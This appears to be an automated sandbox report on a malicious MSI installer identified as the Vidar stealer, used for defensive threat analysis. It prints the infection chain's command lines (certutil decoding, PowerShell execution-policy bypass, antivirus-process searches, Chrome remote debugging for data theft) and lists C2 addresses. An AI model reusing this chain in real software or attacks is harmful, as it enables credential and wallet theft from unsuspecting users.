Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.msi

Overview

General Information

Sample name:Setup.msi
Analysis ID:1576875
MD5:c1d7c466cf70f32ce2fd51609ea97fab
SHA1:d7fa0337f01755188d74e1ca17d9da89d36572da
SHA256:d10e2be559191ccef09f8b31c946fe09840f4c60374d44f6672663c53ba1431a
Tags:msiuser-smica83
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Common Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7480 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7572 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7620 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 50B4D686C01703530B412DCED2DB0D4F C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7816 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E4D759A8E406C9ACB7BC72DE0FA3790E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI64FB.tmp (PID: 7896 cmdline: "C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" MD5: 250DA78FACCE68224B24D0FFAD65CA8E)
  • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • certutil.exe (PID: 7984 cmdline: certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • cscript.exe (PID: 8000 cmdline: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • powershell.exe (PID: 8052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 1308 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • putt.exe (PID: 7284 cmdline: "C:\Users\user\AppData\Local\Temp\putt.exe" MD5: 27B18A5E8BDAA950AF93633A821C2BFA)
          • cmd.exe (PID: 1196 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7548 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 7688 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • tasklist.exe (PID: 7276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 7260 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 1432 cmdline: cmd /c md 628056 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • findstr.exe (PID: 7784 cmdline: findstr /V "Cleared" Penalties MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 7804 cmdline: cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • Corrections.com (PID: 7808 cmdline: Corrections.com u MD5: 62D09F076E6E0240548C2F837536A46A)
              • chrome.exe (PID: 8156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
                • chrome.exe (PID: 4092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2408,i,649146787284632151,17109937592652742530,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • choice.exe (PID: 1516 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 4928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Corrections.com PID: 7808JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: Corrections.com PID: 7808JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Legitimate Application Dropped Script
            Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 7984, TargetFilename: C:\Users\user\AppData\Local\Temp\11808.ps1
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Sigma detected: Browser Started with Remote Debugging
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Corrections.com u, ParentImage: C:\Users\user\AppData\Local\Temp\628056\Corrections.com, ParentProcessId: 7808, ParentProcessName: Corrections.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8156, ProcessName: chrome.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 8000, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", ProcessId: 8052, ProcessName: powershell.exe
            Sigma detected: Common Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: msiexec /fou {C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} /qb, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7572, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}\StubPath
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8052, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe
            Sigma detected: Suspicious Copy From or To System Directory
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\putt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\putt.exe, ParentProcessId: 7284, ParentProcessName: putt.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ProcessId: 1196, ProcessName: cmd.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 8000, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", ProcessId: 8052, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4928, ProcessName: svchost.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Search for Antivirus process
            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1196, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7260, ProcessName: findstr.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:28:33.734481+010020197142Potentially Bad Traffic192.168.2.449738138.124.60.13380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:29:14.293539+010020442471Malware Command and Control Activity Detected116.203.12.114443192.168.2.449785TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:29:16.597803+010020518311Malware Command and Control Activity Detected116.203.12.114443192.168.2.449791TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:29:14.293340+010020490871A Network Trojan was detected192.168.2.449785116.203.12.114443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://sedone.online/empAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 26.2.Corrections.com.4040000.2.unpackMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exeReversingLabs: Detection: 36%
            Source: C:\Users\user\AppData\Local\Temp\putt.exeReversingLabs: Detection: 36%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.6% probability
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdb source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.msi, MSIAE63.tmp.0.dr, MSIAF01.tmp.0.dr, MSI614E.tmp.1.dr, 625ebf.msi.1.dr, MSIAF50.tmp.0.dr, MSIAFB0.tmp.0.dr, MSI60C0.tmp.1.dr
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: c:
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F93FC4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF749F93FC4
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406301 FindFirstFileW,FindClose,16_2_00406301
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FADC54
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA087
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA1E2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_00FAE472
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_00FBA570
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB66DC FindFirstFileW,FindNextFileW,FindClose,26_2_00FB66DC
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7C622 FindFirstFileExW,26_2_00F7C622
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_00FB73D4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB7333 FindFirstFileW,FindClose,26_2_00FB7333
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FAD921
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
            Source: chrome.exeMemory has grown: Private usage: 8MB later: 41MB

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49785 -> 116.203.12.114:443
            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.4:49785
            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.4:49791
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199807592927
